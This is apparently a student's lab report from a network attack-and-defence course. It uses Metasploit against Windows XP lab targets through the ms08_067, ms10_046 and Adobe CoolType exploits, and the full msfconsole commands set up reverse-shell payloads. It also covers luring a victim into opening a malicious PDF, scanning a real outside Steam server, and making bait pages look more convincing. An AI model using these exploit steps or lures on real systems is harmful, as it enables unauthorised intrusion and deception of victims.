文档章节

20155223 实验5 MSF基础应用

o
 osc_x4h57ch8
发布于 2018/04/24 13:10
字数 1404
阅读 15
收藏 0

钉钉、微博极速扩容黑科技,点击观看阿里云弹性计算年度发布会!>>>

20155223 实验5 MSF基础应用

基础问题回答

用自己的话解释什么是exploit,payload,encode?

exploit:漏洞攻击。一个exploit程序肯定会触发系统的一个或多个漏洞,进而程序直接获取到目标系统的部分或所有权限。一个漏洞攻击程序可以在本地运行也可以远程运行,远程运行的漏洞攻击可以理论上获取被攻击系统的所有控制权。 payload:有效载荷,可以理解为搞破坏的关键代码。电脑病毒中可以直接完成预定目标的代码段便是其“有效载荷”。 encode:编码。通过一些特殊手段的编码,可以既保证有效载荷不被破坏,又使得漏洞攻击程序不会被侦察到。

实践内容

主动攻击:ms08_067漏洞攻击

攻击方:Kali Linux x64 靶机:Windows XP SP3(English) 关闭XP的所有防御,包括防火墙和杀毒软件。 在Kali机启动msfconsole,按照指导步骤输入以下代码:

use exploit/windows/smb/ms08_067_netapi   // 使用ms08_067漏洞攻击方式
set payload generic/shell_reverse_tcp       // 以shell反向tcp连接为有效载荷
set RHOST 192.168.129.134     // 受害者的IP
set LHOST 192.168.129.133     // 施害者的IP
set target 0      // 设置目标,0为无差别攻击

输入exploit开始发动攻击:

好了,我已经获取到受害者的控制权了。

对浏览器攻击:ms10_046漏洞攻击

受害者:Windows XP SP3(zh_cn) 攻击者:Kali Linux 在Kali攻击机开启msfconsole,输入以下命令:

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader // 使用浏览器漏洞
set payload windows/meterpreter/reverse_tcp // 选择反向链接载荷

看看这东西需要设置什么:

set SRVHOST 192.168.129.133 // 设置服务器主机IP
set LHOST 192.168.129.133 // 设置攻击机IP

之后输入exploit会出现一段URI:http://192.168.129.133:80/,同时控制台进入监听状态。 受害者访问这个神奇的URI,会弹出一个这样的窗口:

这是光明正大地告诉受害者他被攻击了吗? 同时,一直在监听的控制台同受害者建立起一个连接:

输入sessions查看有多少机器被反向链接到Kali机上(只有一个)。 再次输入sessions -i 1以控制受害者。

对Adobe的漏洞攻击

选择使用他人的成熟方案来攻击Adobe。 输入exploit/windows/fileformat/adobe_cooltype_sing确定攻击方案。 仍然是使用反向链接来做负载。 设置很简单,只需要确定攻击机的IP地址就可以了,端口写死是4444端口。

把生成的文件发送到受害者,并诱使其打开这个来路不明的pdf文件。 打开就卡死,不知道算不算是溢出之类的错误。

同时,在Kali的msfconsole上输入以下命令开始监听:

use exploit/multi/handler
set LHOST 192.168.129.133
set LPORT 4444
exploit

得到结果:

辅助模块的应用

msfconsole命令:show auxiliary去查看全部辅助模块。 浏览中发现一个扫描模块:scanner/steam/server_info.作用初步确定是收集steam服务器信息的。 G胖:嗯,是时候开始新一轮夏季降价了。>:)

use scanner/steam/server_infoshow options 这扫描模块只用设置扫描起点IP即可,扫描范围默认为10(从起始地址开始往后扫10个)。端口固定为UDP端口27015,端口27015只是用作输入/输出的通信端口,一般会有QQ、微信、steam使用该端口。 设置起点为192.168.129.135。如果在这个范围内真的有steam的服务器,我就想知道是哪个人会在这么长的地方设置服务器。 然后是没有,意料之中。 好的,我必须知道哪些IP地址是指向Steam服务器。 《反恐精英:全球攻势》是一款Steam平台上的游戏,如果我要玩这游戏,那么我发送请求的数据包的目的地址一定是一个Steam服务器。所以我要证明这个辅助模块还能用,就必须抓到那个发给Steam服务器的数据包。 不过,我可以选择另一条简单的道路:在游戏里打开控制台,控制台可以在我进入游戏的过程中显示我将要联系上的服务器IP。 我获得到这个IP,怎么感觉这个IP不是中国的。 再次使用scanner/steam/server_info,设置目的IP为所得IP。得到这个:

切!这个只能显示服务器支持哪款游戏,并不能显示这个服务器是以什么系统建立的,也不能显示服务器是不是公共服务器。

实验总结与体会

这个MSF平台还有很多功能我们没有发现,但是其局限性已经暴露无遗。浏览器渗透攻击只针对IE8.0以下版本,根本就不能搞定其他的浏览器;系统只针对经典版本Windows XP,任何高于winXP的操作系统,其自带的防火墙就可以拦阻来自msf制造的攻击;倒是扫描模块不错,有不少特别好用的。但是考虑到正在做实验的IPv6,msf的扫描却只有一个可用的。

离实战还缺些什么技术或步骤?

  • 怎么样才能做到主动出击,而不是制造陷阱让人往里跳?
  • 怎么样让浏览器攻击的诱饵页面更像一个正常的页面?
  • 还没有能够躲开Win10版本的扫描技术。
o
粉丝 0
博文 500
码字总数 0
作品 0
私信 提问
加载中
请先登录后再评论。
2018-2019 20165226 Exp5 MSF基础应用

2018-2019 20165226 Exp5 MSF基础应用 <h4 id=00><font color=black size=5 face="微软雅黑"> 目录</font></h4> <font size=5 face="微软雅黑"> 一、实验内容说明及基础问题回答</font> <fo......

osc_pw27dksr
2019/04/10
6
0
20164301 Exp5 MSF基础应用

Exp5 MSF基础应用 1. 实践内容 1.1一个主动攻击实践,如ms08067,smbdelivery(唯一) 1.2 一个针对浏览器的攻击,如ms10_046; 1.3 一个针对客户端的攻击,如Adobe; 1.4 成功应用任何一个辅...

osc_neajl7oq
2019/04/16
6
0
2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用

2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞 ...

osc_jxumvtli
2018/05/03
2
0
20155328 网络攻防 实验五:MSF基础应用

#20155328 网络攻防 实验五:MSF基础应用 ###实践内容及过程记录一、Windows服务渗透攻击————ms08_067 攻击机:kali 靶机:WindowsXP(英文版) 第一步,分别查看攻击机和靶机的IP。 在k...

osc_f4gmzqne
2018/05/02
1
0
2018-2019-2 20165215《网络对抗技术》Exp5 MSF基础应用

[TOC] 实验内容 一个主动攻击实践,如ms08_067; 一个针对浏览器的攻击,如ms11_050; 一个针对客户端的攻击,如Adobe; 成功应用任何一个辅助模块。 实验原理 MSF主要模块:(Exploit Modul...

osc_3dayg3dw
2019/04/20
1
0

没有更多内容

加载失败,请刷新页面

加载更多

未捕获ReferenceError:未定义$? - Uncaught ReferenceError: $ is not defined?

问题: How come this code throws an 此代码如何引发 Uncaught ReferenceError: $ is not defined 未捕获的ReferenceError:未定义$ when it was OK before? 以前什么时候可以? $(document......

javail
32分钟前
12
0
263. Ugly Number

题目: 263. Ugly Number 题目地址:https://leetcode.com/problems/ugly-number/ Write a program to check whether a given number is an ugly number. Ugly numbers are positive numbers......

JiaMing
55分钟前
60
0
HCIA_ARP01

ARP(地址解析协议) eNSP 常用路由器:AR2220 常用交换机:S5700、S3700 常用终端:PC、MCS(主播服务器) 设备连线:Copper(以太网用到的双绞线)、Serial(串口线,2SA接口)、Auto(自动连...

创业789
58分钟前
25
0
如何在Rails 4中使用问题 - How to use concerns in Rails 4

问题: The default Rails 4 project generator now creates the directory "concerns" under controllers and models. 默认的Rails 4项目生成器现在在控制器和模型下创建目录“Concer”。 ......

fyin1314
今天
19
0
【LeetCode】 57 括号生成

题目: 解题思路: https://leetcode-cn.com/problems/generate-parentheses/solution/hui-su-suan-fa-by-liweiwei1419/ 代码: import java.util.ArrayList;import java.util.List;publ......

JaneRoad
昨天
18
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部